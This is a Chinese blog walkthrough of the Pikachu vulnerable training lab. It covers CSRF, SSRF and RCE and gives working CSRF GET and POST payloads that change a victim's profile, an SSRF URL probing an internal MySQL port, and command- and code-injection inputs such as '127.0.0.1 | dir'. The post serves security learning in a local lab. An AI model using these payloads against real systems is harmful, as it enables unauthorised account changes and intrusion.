pikachu-CSRF-SSRF-RCE速通

最新推荐文章于 2024-07-14 18:10:31 发布
最新推荐文章于 2024-07-14 18:10:31 发布
阅读量343 收藏
点赞数 1
分类专栏: 日常练习 文章标签: csrf 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46684679/article/details/128242276
版权

pikachu-CSRF-SSRF-RCE速通

目录

CSRF

跨站请求伪造,说的通俗一点就是攻击者构造出某个网站的数据包请求并部署好可执行环境,等待受害者去执行,
而受害者在不知情的情况下执行了这个请求,就会做出非预期行为

CSRF(get)

  • 先登录,修改个人信息并且抓包,这就相当于获取了数据包请求的格式,思路就是完全可以构造这么一个数据包请求给受害者用

  • 把数据包请求拷下来,写入hack.html文件放到网站根目录,然后访问这个文件,就相当于去执行这个请求,这里把手机号改成111111

<script>
	document.location="http://192.168.1.28/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=111111&add=nba+lakes&email=kobe%40pikachu.com&submit=submit";
</script>

请添加图片描述
请添加图片描述

CSRF(post)

同样道理,使用js模拟发送一个post数据包,一旦受害者访问hack.html,就会执行非预期请求,这里把手机号该成222222

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
</body>
</html>
<script>
	// post 请求接口
	let url = "http://192.168.1.28/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php"
	//第一步:创建需要的对象
	var httpRequest = new XMLHttpRequest();
	//第二步:打开连接 
	httpRequest.open('POST', url, true); 
	//设置请求头 注:post方式必须设置请求头(在建立连接后设置请求头),根据抓到的包进行构造
	httpRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	let str = "sex=boy&phonenum=222222&add=nba lakes&email=kobe@pikachu.com&submit=submit";

	httpRequest.send(str); //发送请求 将字符串数据写入send中sss
</script>

请添加图片描述

访问后,打开hack.html网络信息,可以发现确实执行了一个post请求,回到pikachu平台并刷新页面,可以发现手机号已经被修改为222222

请添加图片描述

CSRF Token

使用上面get方式进行伪造,可以发现没什么效果,理由是,在提交请求会有一个token验证的过程,
token存在于seesion中,是每个用户特有的,CSRF攻击者无法获取某个用户的token,故无法通过数据包来伪造的

请添加图片描述

SSRF

SSRF(curl)

相当于通过服务器来访问内网中主机或服务的方式
http://192.168.1.28/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1:3306

这里访问本地mysql服务

请添加图片描述

SSRF(file_get_content)

这个貌似只能读取文件,使用于上一道题相同

RCE

exec “ping”

命令执行

127.0.0.1 | dir

请添加图片描述

RCE exec “eval”

代码执行

phpinfo();
伽蓝之堂
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu+RCE+SSRF
qq_54537919的博客
03-11 926
pikachu+RCE+SSRF RCE 4.1 exec "ping" 4.2 exec "eval" SSRF 5.1 SSRF(curl) 5.2 SSRF(file_get_content)
18-csrf漏洞及ssrf漏洞
qq_56414082的博客
03-27 548
跨站请求攻击,简单地说,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。比如: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。
XSS,CSRF,SSRF,RCE
qq_41672971的博客
12-10 289
1111111
pikachu-master.zip
06-25
"Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让学习者在可控的环境中实践和测试各种安全攻防...
pikachu-master
05-04
将下载的pikachu-master压缩包解压到指定目录,如`/opt`: ``` sudo tar -zxvf pikachu-master.tar.gz -C /opt ``` 进入解压后的目录: ``` cd /opt/pikachu-master ``` 5. 配置Pikachu 使用文本编辑器...
pikachu-master靶场
07-14
"pikachu-master靶场" 是一个专门为网络安全学习和实践设计的平台,它通常包含了一系列的挑战,旨在帮助用户提升其在黑客攻防、漏洞挖掘、安全防护等领域的技能。这个压缩包文件“pikachu-master”很可能包含了该...
Forbidden (CSRF cookie not set.)
weixin_53704902的博客
07-09 263
Forbidden (CSRF cookie not set.)
前端技术学习记录-基础知识(二)JavaScript基本语法
adanjeep的博客
07-11 203
/ 声明一个String类型的变量name name = "Alice";// 初始化变量name int age;// 声明一个int类型的变量age age = 25;// 初始化变量age。静态强类型:Java语言,在申明变量时,需要明确定于变量的类型。对明确申明的变量,需要做强制转换,才会发生变化,否则不变。//数字 a = "hahaha";//字符串 </script>动态弱类型语言:变量可以存放在不同类型的值(动态)=== 比较相等(不会进行隐式类型转换)>>> 无符号右移(逻辑右移)
如何搭建互联网医院系统源码?医疗陪诊APP开发实战详解
meihusdk的博客
07-11 277
希望本文能够为正在或即将从事相关开发的技术人员提供一些参考和帮助。通过不断的努力和创新,我们可以为患者提供更优质的医疗服务,推动医疗行业的数字化转型。
微信小程序开发笔记之”表单读不出数据“解决指南
qq_46396470的博客
07-12 308
脑瓜子好了后,忘记了表单控件必须要加上。提交后打印的字典是空的,卡了十几分钟。
Node多版本管理器NVM安装使用
GongWeiBuQi的博客
07-11 201
安装node很方便,只需要一条命令可以轻松切换node版本可以多版本node并存。
【vueUse库Reactivity模块各函数简介及使用方法--下篇】
xiejunlan的博客
07-11 1409
vueUseReactivity函数构想中的refWithControl函数可能的实现方式总结2. syncRef构想中的syncRef函数可能的实现方式注意事项总结3.syncRefs构想中的syncRefs函数可能的实现方式注意事项总结假想的toReactive函数注意事项假设的toReactive函数实现结论5.toReftoRef函数介绍使用方法示例代码总结6.toRefstoRefs函数介绍使用方法示例代码总结7.toValue使用 Vue 3 自身的 API示例使用 vueUse 的类似功能。
Javafx利用fxml变换场景的小细节
2301_80311013的博客
07-09 901
在这个代码中,在JavaFX中,FXMLLoader是用来加载FXML文件并将其转换为Java对象(例如控制器类)的工具。当您使用FXMLLoaderFXMLLoader在整个过程中,FXMLLoader是使用JavaFX的后台线程(也称为JavaFX线程)来执行这些操作的,这是为了保持UI线程的响应性。这意味着在用户界面(UI)线程中,您不会看到任何阻塞,即使FXMLLoader正在执行耗时的操作。当FXMLLoader完成加载并调用load()方法时,它会返回一个Parent。
this指向解析
最新发布
Zrf2191318455的博客
07-14 266
2.3:调用构造函数personA中的show2函数,为箭头函数,指向外层最近的普通函数的this,在第一题中,person1只是一个对象,所以指向windows,但是在第二题中,personA为构造函数,show2指向的就是personA,所以依旧打印personA。1.8:调用person1中的show4函数,并再次调用返回函数,show4为普通函数,返回函数为箭头函数,箭头函数的this指向为外面最近一层普通函数的this,即show4的this,因此打印person1。
一个使用Go语言和现代Web技术构建跨平台桌面应用程序开源项目
yunmoon的博客
07-10 1057
Wails作为一个桥梁,连接强大的Go后端逻辑与丰富的Web前端界面,允许开发者利用两者的最佳特性来开发应用。
前端工具-json-server
zhangankang的博客
07-14 89
以项目为例,介绍前端mock数据的方式;
Webkit简介以及工作流程
读心悦
07-10 328
WebKit是一个开源的浏览器引擎,最初由苹果公司基于KHTML(K Desktop Environment的HTML渲染引擎)开发,并广泛应用于Safari浏览器。随着时间的推移,WebKit也被其他多款浏览器和应用所采用,成为Web技术生态中的重要一员。WebKit的核心功能包括解析HTML、CSS、JavaScript等网页内容,并将其渲染为可视化的网页页面。它主要由WebCore(负责HTML解析、CSS样式计算和布局)和JavaScriptCore(负责JavaScript解释执行)两大部分组成。
Power Apps使用oData访问表数据并赋值前端
weixin_41850878的博客
07-14 200
console.log需要F12打开浏览器开发者工具查看。方法过滤数据时,你可以指定一个OData。方法成功的例子,它使用了OData。在使用OData查询语法通过。参数来限制返回的记录集。
Parse error: syntax error, unexpected '[' in E:\phpstudy_pro\WWW\pikachu-master\vul\ssrf\ssrf_curl.php on line 15
08-17
在文件ssrf_curl.php的第15行,出现了一个意外的`[`符号,导致解析错误。这种错误通常是因为使用了不兼容的语法或者PHP版本问题。要解决这个问题,可以尝试以下几个步骤: 1. 检查代码是否有语法错误,特别是在第15...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值